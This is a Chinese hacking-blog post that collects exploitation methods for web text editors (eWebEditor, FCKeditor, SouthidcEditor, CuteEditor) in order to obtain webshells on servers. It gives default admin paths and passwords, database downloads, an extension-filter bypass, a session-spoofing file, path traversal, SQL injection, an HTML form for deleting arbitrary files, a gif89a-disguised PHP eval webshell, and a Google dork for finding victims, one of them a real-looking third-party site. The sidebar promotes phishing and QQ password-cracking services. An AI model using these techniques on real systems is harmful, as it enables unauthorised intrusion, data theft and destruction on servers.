我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 安全运维ewebeditor ewebeditornet fckeditoreditor southidceditor 漏洞集合
ewebeditor ewebeditornet fckeditoreditor southidceditor 漏洞集合
6887
1推荐
0评论

常见的一些编辑器:ewebeditor ewebeditornet fckeditoreditor southidceditor SouthidcEditor bigcneditor

其实如果大家多关注编辑器的话,会有惊人的发现,尤其是jsp,php版的,一个webshell基本上就是一台服务器啊~~~

一:首先说说最近不断爆洞的ewebeditor

(一)ASP版


1:默认管理后台:

http://www.test.com/ewebeditor/admin_login.asp

后台如果能进入:

可点击样式管理:

standard 拷贝一份(直接修改改不了)

在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览

在编辑器里点设计 然后直接上传asa大马.

上传后 在代码里可以看到马的位置!

(原理:因为在iis里 网站的属性里 应用程序配置一项 asa扩展名还是用asp.dll来解析的,asp也是 还有 cer cdx )

在cer cdx asa的被删掉 那么马儿就找不到 映射不过去.

可以在拷贝过后的样式 图片类型里加入 aaspsp 然后在上传 直接就可以上传asp文件


2:下载默认数据库

www.test.com/ewebeditor/db/ewebeditor.mdb

然后分析数据库

webeditor_system(1) 就可以看到用户名和密码 如果破解不出来

可以在webeditor_style(14 样式表里

主要看允许上传文件的扩展名(s-fileext s_ingeext)

看到一个小黑客曾经搞过 多了asa aaspsp

可以用他来利用!(后台找不到的情况下也可以用此方法)

可以构造语句:

比如 ID=46 s-name =standard1

构造 代码: ewebeditor.asp?id=content&style=standard

ID和和样式名改过后

ewebeditor.asp?id=46&style=standard1


然后就是进入编辑器 上传asa 或者asp的 得到webshell

前面的1跟2说的是asp版的ewebeditor,其他如php,jsp跟asp的差不多,这里不多说.

针对这种方法可能出现的问题:

(1).使用默认用户名和密码无法登录。
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法

****,那就当自己的运气不好了。
(2).加了asa类型后发现还是无法上传。
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace

(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""),

"HTR", "")
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp

”过滤了“asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名

的过滤。
(3).上传了asp文件后,却发现该目录没有运行脚本的权限。
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?

(4).已经使用了第2点中的方法,但是asp类型还是无法上传。
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到“远程类型”了吗?eWebEditor能够设定自动保存远程文件

的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中

的“应用文件映射”中的“asp”删除。

漏洞原理
漏洞的利用原理很简单,请看Upload.asp文件:
任何情况下都不允许上传asp脚本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时

过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!

3.eWebEditor session欺骗漏洞

eWebEditor在线编辑器

漏洞文件:Admin_Private.asp

漏洞语句:<%

If Session("eWebEditor_User") = "" Then

Response.Redirect "admin_login.asp"

Response.End

End If

只判断了session,没有判断cookies和路径的验证问题。

漏洞利用:

新建一个h4x0r.asp内容如下:

<%Session("eWebEditor_User") = "11111111"%>

访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp

漏洞影响:虚拟主机的克星.

4.ewebeditor asp版 2.1.6 上传漏洞

ewebeditor asp版 2.1.6 上传漏洞利用程序




http://127.1/e/upload.asp

上传时修改此处上传地址。。。

如果你是上传的asp文件则成功后的地址为:

http://127.1/e/uploadfile/xxxxxxxxxx.asp

5.ewebeditor遍历路径漏洞
Ewebeditor为非常常见的网站核心程序,
默认数据库为 /db/ewebeditor.mdb 默认路径admin_login.asp 默认管理员admin密码admin(admin888)

ewebedit进入后台添加样式.得到webshell很容易. 有时候很不幸.管理员把数据库改为只读权限.

但是ewebeditor后台有个小小的缺陷. 可以历遍整个网站目录. 当然.数据库为只读的时候一样可以利用.

上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了

6.eweb2.7版本以下又一个注入

首先看代码(ewebeditor.asp):
ub InitPara()
' 取全屏标志
sFullScreen = Trim(Request.QueryString("fullscreen"))
' 取对应的内容ID
sContentID = Trim(Request.QueryString("id"))
If sContentID = "" Then ShowErr "请传入调用参数ID,即隐藏的内容表单项ID!"

' 取样式初始值
sStyleName = Trim(Request.QueryString("style"))
If sStyleName = "" Then sStyleName = "standard"

sSql = "select * from ewebeditor_style where s_name='" & sStyleName & "'"
oRs.Open sSql, oConn, 0, 1
If Not oRs.Eof Then
sStyleID = oRs("S_ID")
sStyleName = oRs("S_Name")
sStyleDir = oRs("S_Dir")
sStyleCSS = oRs("S_CSS")
sStyleUploadDir = oRs("S_UploadDir")
nStateFlag = oRs("S_StateFlag")
sDetectFromWord = oRs("S_DetectFromWord")
sInitMode = oRs("S_InitMode")
sBaseUrl = oRs("S_BaseUrl")

sStyleUploadDir = Replace(sStyleUploadDir, "\", "/")
If Right(sStyleUploadDir, 1) <> "/" Then
sStyleUploadDir = sStyleUploadDir & "/"
End If
Else
ShowErr "无效的样式Style参数传入,如果要使用默认值,请留空!"
End If
oRs.Close
关键的是这两句:
sStyleName = Trim(Request.QueryString("style"))
If sStyleName = "" Then sStyleName = "standard"

sSql = "select * from ewebeditor_style where s_name='" & sStyleName & "'"
很明显的是style参数没有足够的过滤,如果我们自己给这个地方赋值的话,程序会报错的,

但接下来的一句还是让我们有可乘之机,If sStyleName = "" Then sStyleName = "standard"保留默认的还是会带入语句执行,加个

单引号就报错了,如图2.[local]1[/local]
我试了好几款工具,发现只有pangolin可以注入,啊D只能发现注入不能继续猜解。
eweb默认的管理员表是:ewebeditor_system
这个表下的默认两个列名为:sys_UserName和sys_userpass
需要手动添加,

7.ewebeditor2.8最终版删除任意文件漏洞

这个漏洞可以很鸡肋,也可以很致命,关键看你怎么利用!

此漏洞存在于ExampleNewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码:

' 把带"|"的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, "|")
' 删除新闻相关的文件,从文件夹中
Dim i
For i = 0 To UBound(aSavePathFileName)
' 按路径文件名删除文件
Call DoDelFile(aSavePathFileName(i))
Next

而aSavePathFileName是前面从数据库取出来的:

sSavePathFileName = oRs("D_SavePathFileName")

看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:

sSavePathFileName = GetSafeStr(Request.Form("d_savepathfilename"))
...
oRs("D_SavePathFileName") = sSavePathFileName

居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:

Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), "'", ""), Chr(34), ""), ";", "")
End Function

无语,这不是过滤字符型注入的函数么?放这里什么用也没有啊!既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其

中d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新闻,于是主目录

下的eWebEditor.asp不见了!

下面给出利用的htm:
eWebEditor删除文件 by:oldjun(<a>http://www.oldjun.com)</TITLE</a>><br /> <style>body,p,td,input {font-size:9pt}</style><br /> </HEAD><BODY><a href='list.asp'>新闻列表</a> | <a href='add.asp'>增加新闻</a> </p> <p> <b>增加新闻</b> </p> <p> <form action="<a>http://127.0.0.1/editor/Example/NewsSystem/addsave.asp</a>" <br /> method="post" name="myform"><br /> <input type=hidden name=d_nofilename><br /> <input type=hidden name=d_savefilename><br /> <table cellspacing=3 align=center><br /> <tr><td>要删的文件(相对路径就可以了):</td><br /> <td><input type="text" name="d_savepathfilename" value="" size="90"></td><br /> </tr><br /> <tr><td>新闻标题(随便填):</td><br /> <td><input type="text" name="d_title" value="" size="90"></td><br /> </tr><br /> <tr><td>标题图片:</td><br /> <td><select name="d_picture" size=1><option value=''>无</option></select><br /> 当编辑区有插入图片时,将自动填充此下拉框</td><br /> </tr><br /> <tr><td>新闻内容(随便填):</td><br /> <td><textarea name="d_content"></textarea></td><br /> </tr><br /> </table> </p> <p> <input type=submit name=btnSubmit value=" 提 交 "> <br /> <input type=reset name=btnReset value=" 重 填 "><br /> </form><br /> </BODY></HTML> </p> <p> (二)ASPX版: </p> <p> 受影响文件:eWebEditorNet/upload.aspx </p> <p> 利用方法:添好本地的cer的Shell文件。在浏揽器输入javascript:lbtnUpload.click();就能得到shell </p> <p> 嘿嘿....绕过了限制......成功的上传了ASPX文件.... </p> <p> 文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功..... </p> <p> (三)PHP版 </p> <p> 关于eWebEditor 漏洞php版本的和asp的一样。有目录浏览。和编辑扩展名。重点在于虽然支持了php格式但上传还是上传不了。不过 </p> <p> 利用织梦的gif89a漏洞倒可以实现php一句话上传,然后再上传webshell。 </p> <p> 备注:织梦的gif89a漏洞,准确来说应该是DEDECMS中所用的php版的FCKeditor存在上传漏洞,gif89a文件头欺骗。DEDECMS中在上传 </p> <p> 拖上没有对picSubmit进行任何处理。但是却不能直接上传php马。因为会识别。使用修改过的php小马。 </p> <p> gif89a </p> <p> <?php </p> <p> phpinfo(); </p> <p> ?> </p> <p> RFI </p> <p> gif89a </p> <p> <?php </p> <p> eval($_POST[c]); </p> <p> ?> </p> <p> 利用gif89a进行了欺骗。现在上传就可以成功了.然后有php一句话客户端连接. </p> <p> (四)JSP版 </p> <p> 上传漏洞 </p> <p> 影响版本:漏洞存在于ewebeditor jsp版 1.4以下版本,漏洞有两个版本。 </p> <p> 原理:第一个是使用savefile.jsp来进行文件上传操作的,从代码中可以看出,程序并没做任何上传过滤,这样我们就可以直接上传 </p> <p> 一个JSPShell了。另一个版本可能是被人修改过,把代码转成了servlet,不能看到代码,但是利用方法却大同小异。 </p> <p> 利用方法:我们先找一个1.4版本以下的ewebeditor JSP上传页面,选择好一个JSPShell。这个ewebeditor是没有提交按钮的,所以这 </p> <p> 里涉及到一个小技巧,就是在上传的对话框中敲下回车,大约过半分钟,就可以查看网页的源文件来寻找我们的Webshell了。 </p> <p> 这个JSP和PHP一样,如果系统权限没有特意去设置的话,默认我们得到webshell是system的权限,那么...^_^ </p> <p> 二:ewebeditornet 漏洞利用 </p> <p> 默认上传地址: </p> <p> <a>www.test.com/ewebeditornet/upload.aspx</a> </p> <p> <br /> 可以直接上传一个cer的木马 </p> <p> 在无法上传的情况下 </p> <p> 可以地址栏构造以下代码: javascript:lbtnUpload.click(); </p> <p> 然后查看源代码: </p> <p> 找到uploadsave 找到地址 </p> <p> 默认传到uploadfile这个文件夹里 </p> <p> (漏洞修补: 可以在iss里直接把upload文件夹的执行权限选择无. ) </p> <p> 三:fckeditor 漏洞利用 </p> <p> <a>http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp</a>? </p> <p> Command=FileUpload&Type=Image&CurrentFolder=/<br /> 就把文件名字段改成NEWfile 选择文件名可定义<br /> 上传过后在/userfiles/image/找文件 </p> <p> 上传任意文件: </p> <p> fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp </p> <p> 根据网站所使用不同语言自己改这个地址. </p> <p> FCKeditor的JSP版漏洞 </p> <p> <a>http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector</a>? </p> <p> Command=FileUpload&Type=Image&CurrentFolder=%2F </p> <p> <a>http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector</a>? </p> <p> Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F<br /> 上传shell的地址:<br /> <a>http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html</a>? </p> <p> Type=Image&Connector=connectors/jsp/connector </p> <p> 四:southidceditor </p> <p> 1. </p> <p> <a>http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb</a> </p> <p> <a>http://www.xhkjit.com/admin/southidceditor/popup.asp</a> </p> <p> <a>http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp</a> </p> <p> 2.southidceditor存在一个可以抓包上传的漏洞 </p> <p> Google:inurl:(admin/SouthidcEditor/PopUp.asp) </p> <p> nc抓包自己玩玩吧. </p> <p> <br /> 五:bigcneditor(这个我没有找到具体的漏洞,网上的文章也都比较不负责任,谁知道的请告诉我下,谢谢) </p> <p> 这个页不多说了 </p> <p> 原理都差不多! </p> <p> 防范方法很简单就不多讲了, </p> <p> 六:CuteEditor编辑器通杀漏洞 </p> <p> CuteEditor编辑器是.NET下最常用的一个编辑器..<br /> 十分的强大..也许是因为他太强了 HEHE ..<br /> 我们随便找到一个装有此编辑器的网站 点击插入图片 FLASH 影音文件 什么的都可以出来一个对话框.<br /> 在这个对话框里可以游览用户所上传的数据还有目录..郁闷的是居然可以新建..移动..修改..<br /> 在官网上甚至连删除都弄出来了..呵呵.. 我们这次主要是利用2003服务器的特性来进行利用..<br /> 大家都知道在2003的IIS环境下 如果你建一个 XXX.asp 文件夹的话 里面不管放什么其他类型的文件<br /> 在IIS里都会通过文件夹名的类型来解析 也就是说你传一个JPG的东西到 XXX.ASP下也会以ASP脚本<br /> 来进行解析..我们这里就利用他这一特性...首先我们随便找一个编辑器 然后选择插入图片吧(如图1)..插入其他的<br /> 东西都行..只要能新建文件目录..或者可以移动目录.. </p> <p> 看这里就有新建文件夹等等一些操作的按钮我们新建一个..如果新建不能用可以试试移动文件夹把以有的文件夹名改成 XXX.asp形 </p> <p> 式.. </p> <p> 好了.我们新建一个 <a>www.asp</a> 文件夹. </p> <p> 确定..我们的文件夹就建好了..然后点击进入该文件夹 ( </p> <p> 然后到了最关键的...我们上传文件..<br /> 用插入图片是上传不了的..他会检测是不是正常的图片..<br /> 可以试试 插入 FLASH <br /> 或者插入 视频 音乐文件..我们这里就插入视频.. 然后直接把 我们要传上去的马后缀改为 .avi形式<br /> 然后进入我们刚才新建的那个目录 然后上传 .. 文件就上去了 </p> </div> </div> </div> <!--日志结束--> <div class="next"> <span class="aritcle_up">上一篇:<a href="http://www.shack2.org/article/1.html">Css基础积累</a></span> <span class="aritcle_down">下一篇:<a href="http://www.shack2.org/article/81.html">iis7.5解析漏洞</a></span> </div> <div class="comment_list"> <div class="comment_title">已经有 ( <em>0</em> ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    <a class="recommend_btn" aid="80" href="javascript:void(0)">推 荐</a></div> <div class="comment_list_list"> <ul> </ul> </div> <div class="commonpost" id="posttop"> <div class="commontitle mt8">欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本</div> <form id="commentform" name="commentform" method="post" action="savaComment.htm" onsubmit="return checkComment()" > <p><input type="hidden" name="ARTICLE_ID" id="articleId" value="80" /></p> <p><input type="text" name="USERNAME" id="uname" class="text" value="" size="28" tabindex="1" /> <label for="uname">名称(必填)</label></p> <p><input type="text" name="EMAIL" id="mail_qq" class="text" value="" size="28" tabindex="2" /> <label for="mail_qq">邮箱</label></p> <p><textarea name="CONTENT" style="WIDTH: 600px;height:100px" id="comment" class="text" cols="40" rows="4" tabindex="5" ></textarea></p> <p><input name="btnSumbit" type="submit" tabindex="6" value="发布我的点评" /></p> <p></p> </form> </div> </div> </div> <!--左边 结束--> <!--右边--> <div class="mright"> <!--act_top--> <div class="act_top"> <!--最近动态--> <div class="act_top_list_m"> <div class="act_top_tab"> <ul> <li class="act_top_tab_on">最近动态</li> <li> </li> <li> </li> </ul> </div> <div class="act_top_fulllist"> <div> <ul> <li><a href="http://xss.shack2.org/"><b>Web安全测试综合利用平台邀请你来测(XSS/钓鱼全都有)!</b></a> </li> <li> <a href="http://test.shack2.org/"><b>站长/开发/Web渗透、安全测试2千人安全交流群:84978967。</b></a> </li> <li> <a href="#">接各种小软件定制、程序修改,QQ:1341413415</a> </li> <li> <a href="http://www.shack2.org/article/1417357815.html" title="超级SQL注入工具[SSQLInjection] V1.0正式版更新-2018-08-09">超级SQL注入工具[SSQLInjection] V1.0正式版更新-2018-08-09</a> </li> <li> <a href="http://www.shack2.org/article/1374154000.html" title="Struts2漏洞检查工具(更新V1.8增加S2-045/S2-046)-2017-3-21">Struts2漏洞检查工具(更新V1.8增加S2-045/S2-046)-2017-3-21</a> </li> <li> <a href="http://www.shack2.org/article/1428419001.html" title="Axis2 WebService WebShell-2015-04-07">Axis2 WebService WebShell-2015-04-07</a> </li> <li> <a href="http://www.shack2.org/article/1417190167.html" title="Java JDK低版本Jsp WebShell发布(更新1.4)-2014-11-28">Java JDK低版本Jsp WebShell发布(更新1.4)-2014-11-28</a> </li> </ul> </div> </div> </div> <div class="act_top_list_m"> <div class="act_top_tab" id="act_top_tab"> <ul> <li class="act_top_tab_on">点击Top</li> <li>推荐Top</li> <li>评论Top</li> </ul> <a href="http://www.shack2.org/" target="_blank" title="更多" class="more_info">更 多>></a> </div> <div class="act_top_list" id="act_top_list"> <!--点击TOP--> <div> <ul> <li> <a href="http://www.shack2.org/article/1417357815.html" title="超级SQL注入工具【SSQLInjection】">超级SQL注入工具【SSQLInjection】</a> <span class="info">120661阅</span> </li> <li> <a href="http://www.shack2.org/article/1.html" title="Css基础积累">Css基础积累</a> <span class="info">97154阅</span> </li> <li> <a href="http://www.shack2.org/article/1374154000.html" title="Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)">Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)</a> <span class="info">93369阅</span> </li> <li> <a href="http://www.shack2.org/article/72.html" title="SWebScan3.0网站目录扫描器,Java版网站目录扫描器JWebScan">SWebScan3.0网站目录扫描器,Java版网站目录扫描器JWebScan</a> <span class="info">47053阅</span> </li> <li> <a href="http://www.shack2.org/article/1434992090.html" title="超级Web漏洞扫描器【SWebScan】">超级Web漏洞扫描器【SWebScan】</a> <span class="info">35532阅</span> </li> <li> <a href="http://www.shack2.org/article/1422779387.html" title="SQL注入系列视频教程">SQL注入系列视频教程</a> <span class="info">31252阅</span> </li> <li> <a href="http://www.shack2.org/article/63.html" title="phpcms V9最新漏洞利用工具">phpcms V9最新漏洞利用工具</a> <span class="info">29141阅</span> </li> <li> <a href="http://www.shack2.org/article/161.html" title="Struts2漏洞批量拿站及Struts2远程命令执行漏洞分析及防范">Struts2漏洞批量拿站及Struts2远程命令执行漏洞分析及防范</a> <span class="info">28349阅</span> </li> <li> <a href="http://www.shack2.org/article/205.html" title="dedecms v5.7漏洞批量getshell工具Java版(已更新V1.1)">dedecms v5.7漏洞批量getshell工具Java版(已更新V1.1)</a> <span class="info">25808阅</span> </li> <li> <a href="http://www.shack2.org/article/79.html" title="Struts终极漏洞利用工具及代码 ">Struts终极漏洞利用工具及代码 </a> <span class="info">25427阅</span> </li> </ul> </div> <!--点击TOP 结束--> <!--推荐TOP--> <div style="display:none"> <ul> <li> <a href="http://www.shack2.org/article/1417357815.html" title="超级SQL注入工具【SSQLInjection】">超级SQL注入工具【SSQLInjection】</a> <span class="info">17荐</span> </li> <li> <a href="http://www.shack2.org/article/1374806777.html" title="Java版博客源码SJBlog v1.0发布">Java版博客源码SJBlog v1.0发布</a> <span class="info">7荐</span> </li> <li> <a href="http://www.shack2.org/article/72.html" title="SWebScan3.0网站目录扫描器,Java版网站目录扫描器JWebScan">SWebScan3.0网站目录扫描器,Java版网站目录扫描器JWebScan</a> <span class="info">7荐</span> </li> <li> <a href="http://www.shack2.org/article/1374154000.html" title="Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)">Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)</a> <span class="info">6荐</span> </li> <li> <a href="http://www.shack2.org/article/1417190167.html" title="SJavaWebManage(更新V1.4)">SJavaWebManage(更新V1.4)</a> <span class="info">5荐</span> </li> <li> <a href="http://www.shack2.org/article/1422779387.html" title="SQL注入系列视频教程">SQL注入系列视频教程</a> <span class="info">5荐</span> </li> <li> <a href="http://www.shack2.org/article/79.html" title="Struts终极漏洞利用工具及代码 ">Struts终极漏洞利用工具及代码 </a> <span class="info">4荐</span> </li> <li> <a href="http://www.shack2.org/article/60.html" title="代查5位QQ历史密码,代查6位QQ历史密码,代查7位QQ历史密码,代查8位QQ历史密码,代查9位QQ历史密码">代查5位QQ历史密码,代查6位QQ历史密码,代查7位QQ历史密码,代查8位QQ历史密码,代查9位QQ历史密码</a> <span class="info">4荐</span> </li> <li> <a href="http://www.shack2.org/article/189.html" title="C#版二级域名查询工具-SDomainQuery">C#版二级域名查询工具-SDomainQuery</a> <span class="info">3荐</span> </li> <li> <a href="http://www.shack2.org/article/63.html" title="phpcms V9最新漏洞利用工具">phpcms V9最新漏洞利用工具</a> <span class="info">3荐</span> </li> </ul> </div> <!--推荐TOP 结束--> <!--评论TOP--> <div style="display:none"> <ul> <li> <a href="http://www.shack2.org/article/1374154000.html" title="Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)">Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)</a> <span class="info">38评</span> </li> <li> <a href="http://www.shack2.org/article/60.html" title="代查5位QQ历史密码,代查6位QQ历史密码,代查7位QQ历史密码,代查8位QQ历史密码,代查9位QQ历史密码">代查5位QQ历史密码,代查6位QQ历史密码,代查7位QQ历史密码,代查8位QQ历史密码,代查9位QQ历史密码</a> <span class="info">38评</span> </li> <li> <a href="http://www.shack2.org/article/1417357815.html" title="超级SQL注入工具【SSQLInjection】">超级SQL注入工具【SSQLInjection】</a> <span class="info">38评</span> </li> <li> <a href="http://www.shack2.org/article/1434992090.html" title="超级Web漏洞扫描器【SWebScan】">超级Web漏洞扫描器【SWebScan】</a> <span class="info">19评</span> </li> <li> <a href="http://www.shack2.org/article/1392544368.html" title="Java社工库程序SGWeb">Java社工库程序SGWeb</a> <span class="info">13评</span> </li> <li> <a href="http://www.shack2.org/article/1422779387.html" title="SQL注入系列视频教程">SQL注入系列视频教程</a> <span class="info">13评</span> </li> <li> <a href="http://www.shack2.org/article/1492948356.html" title="超级弱口令检查工具,检查SSH/FTP/MySQL/Oracle/SQLServer弱口令">超级弱口令检查工具,检查SSH/FTP/MySQL/Oracle/SQLServer弱口令</a> <span class="info">9评</span> </li> <li> <a href="http://www.shack2.org/article/72.html" title="SWebScan3.0网站目录扫描器,Java版网站目录扫描器JWebScan">SWebScan3.0网站目录扫描器,Java版网站目录扫描器JWebScan</a> <span class="info">7评</span> </li> <li> <a href="http://www.shack2.org/article/205.html" title="dedecms v5.7漏洞批量getshell工具Java版(已更新V1.1)">dedecms v5.7漏洞批量getshell工具Java版(已更新V1.1)</a> <span class="info">5评</span> </li> <li> <a href="http://www.shack2.org/article/1374806777.html" title="Java版博客源码SJBlog v1.0发布">Java版博客源码SJBlog v1.0发布</a> <span class="info">5评</span> </li> </ul> </div> <!--评论TOP 结束--> </div> </div> <!--右侧单块 结束--> <div class="act_top_list_m"> <div class="act_top_tab"> <ul> <li class="act_top_tab_on">最近留言</li> <li> </li> <li> </li> </ul> <a href="http://www.shack2.org/msg/index.html" target="_blank" title="更多" class="more_info">更 多>></a> </div> <div class="act_top_list"> <div> <ul> <li> <a href="http://www.shack2.org/msg/index.html#msg" title="你好博主,我是PC_Rose,嘿嘿,能认识一下吗,望加个好友,一起学习探讨.">你好博主,我是PC_Rose,嘿嘿,能认识一下吗,望加个好友,一起学习探讨.</a> <span class="info"><a title="PC_Rose">PC_Rose</a></span> </li> <li> <a href="http://www.shack2.org/msg/index.html#msg" title="膜拜大佬,很想要大佬的本地测试环境学习SQL注入,求大佬出一个本地环境搭建教程">膜拜大佬,很想要大佬的本地测试环境学习SQL注入,求大佬出一个本地环境搭建教程</a> <span class="info"><a title="soapffz">soapffz</a></span> </li> <li> <a href="http://www.shack2.org/msg/index.html#msg" title="SWebscan 请问 这个由源码吗?">SWebscan 请问 这个由源码吗?</a> <span class="info"><a title="liyunhua">liyunhua</a></span> </li> <li> <a href="http://www.shack2.org/msg/index.html#msg" title="http://www.shack2.org/article/1392544368.html 此文百度网盘下载地址失效,能否补下链接 还有能否说明下怎么使用呢,这个怎么编译">http://www.shack2.org/article/1392544368.html 此文百度网盘下载地址失效,能否补下链接 还有能否说明下怎么使用呢,这个怎么编译</a> <span class="info"><a title="链接失效">链接失效</a></span> </li> <li> <a href="http://www.shack2.org/msg/index.html#msg" title="膜拜航牛哈哈">膜拜航牛哈哈</a> <span class="info"><a title="123">123</a></span> </li> <li> <a href="http://www.shack2.org/msg/index.html#msg" title="Do you have english version of your tools (SQL Injection)?? Atleast to understand what is the tab names etc.. so that to understand and have a try of it.">Do you have english version of your tools (SQL Injection)?? Atleast to understand what is the tab names etc.. so that to understand and have a try of it.</a> <span class="info"><a title="Kiran Kumar">Kiran Kumar</a></span> </li> <li> <a href="http://www.shack2.org/msg/index.html#msg" title="一朋友推荐的。。。。。">一朋友推荐的。。。。。</a> <span class="info"><a title="想找个比较好的getshell软件">想找个比较好的getshell软件</a></span> </li> <li> <a href="http://www.shack2.org/msg/index.html#msg" title="你是网络安全的?">你是网络安全的?</a> <span class="info"><a title="yang">yang</a></span> </li> <li> <a href="http://www.shack2.org/msg/index.html#msg" title="你是怎么知道我的密码的?">你是怎么知道我的密码的?</a> <span class="info"><a title="yang">yang</a></span> </li> <li> <a href="http://www.shack2.org/msg/index.html#msg" title="有没有qq qq群啊 大神 有没有qq qq群啊 大神 有没有qq qq群啊 大神">有没有qq qq群啊 大神 有没有qq qq群啊 大神 有没有qq qq群啊 大神</a> <span class="info"><a title="有没有qq qq群啊 大神">有没有qq qq群啊 大神</a></span> </li> </ul> </div> </div> </div> <div class="act_top_list_m"> <div class="act_top_tab"> <ul> <li class="act_top_tab_on">最新评论</li> <li> </li> <li> </li> </ul> </div> <div class="act_top_list"> <div> <ul> <li> <a href="http://www.shack2.org/article/1417357815.html#comment1417357815" title="可以在win2003 server下运行吗? ">可以在win2003 server下运行吗? </a> <span class="info"><a title="菜鸟">菜鸟</a></span> </li> <li> <a href="http://www.shack2.org/article/1417357815.html#comment1417357815" title="可以在win2003 server下运行吗? ">可以在win2003 server下运行吗? </a> <span class="info"><a title="菜鸟">菜鸟</a></span> </li> <li> <a href="http://www.shack2.org/article/1492948356.html#comment1492948356" title="有这样一种情况假如我猜解1433的口令,但是服务器把端口改成别的端口了,可否猜解某一端口范围比如1430-1440的sa弱口令呢?">有这样一种情况假如我猜解1433的口令,但是服务器把端口改成别的端口了,可否猜解某一端口范围比如1430-1440的sa弱口令呢?</a> <span class="info"><a title="海阔天空">海阔天空</a></span> </li> <li> <a href="http://www.shack2.org/article/1492948356.html#comment1492948356" title="有这样一种情况假如我猜解1433的口令,但是服务器把端口改成别的端口了,可否猜解某一端口范围比如1430-1440的sa弱口令呢?">有这样一种情况假如我猜解1433的口令,但是服务器把端口改成别的端口了,可否猜解某一端口范围比如1430-1440的sa弱口令呢?</a> <span class="info"><a title="海阔天空">海阔天空</a></span> </li> <li> <a href="http://www.shack2.org/article/1492948356.html#comment1492948356" title="大神 你这个程序 总体设计还是可以 但是有一个问题 希望你看一下 当选择多个服务的时候 进度条 和总是 比例不对 进度条只能显示10%左右 就显示完成!希望你看看 谢谢">大神 你这个程序 总体设计还是可以 但是有一个问题 希望你看一下 当选择多个服务的时候 进度条 和总是 比例不对 进度条只能显示10%左右 就显示完成!希望你看看 谢谢</a> <span class="info"><a title="小弟求教">小弟求教</a></span> </li> <li> <a href="http://www.shack2.org/article/1434992090.html#comment1434992090" title="博主辛苦了,有个小建议,可以显示扫描过程,不然只有一个数字跳动,很慌">博主辛苦了,有个小建议,可以显示扫描过程,不然只有一个数字跳动,很慌</a> <span class="info"><a title="大保健">大保健</a></span> </li> <li> <a href="http://www.shack2.org/article/1434992090.html#comment1434992090" title="不能暂停,stop后又的重新扫描,不能重暂停的地方开始扫描,很不方便哦">不能暂停,stop后又的重新扫描,不能重暂停的地方开始扫描,很不方便哦</a> <span class="info"><a title="itooo">itooo</a></span> </li> <li> <a href="http://www.shack2.org/article/1417357815.html#comment1417357815" title="今日得见大神真身,膜拜,膜拜,牛逼的人都很低调!">今日得见大神真身,膜拜,膜拜,牛逼的人都很低调!</a> <span class="info"><a title="膜拜大神">膜拜大神</a></span> </li> <li> <a href="http://www.shack2.org/article/1417357815.html#comment1417357815" title="脱裤助手什么时候加上">脱裤助手什么时候加上</a> <span class="info"><a title="脱裤助手什么时候加上">脱裤助手什么时候加上</a></span> </li> <li> <a href="http://www.shack2.org/article/1514975744.html#comment1514975744" title="博主这个工具下载地址失效了,可否更新一下">博主这个工具下载地址失效了,可否更新一下</a> <span class="info"><a title="空空老师">空空老师</a></span> </li> </ul> </div> </div> </div> <!--标签列表--> <div class="act_top_list_m"> <div class="act_top_tab"> <ul> <li class="act_top_tab_on">标签列表</li> <li> </li> <li> </li> </ul> </div> <div class="tags_list"> <a href="http://www.shack2.org/search/index.htm?keywords=%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AE%89%E5%85%A8" title="数据库安全">数据库安全</a> <a 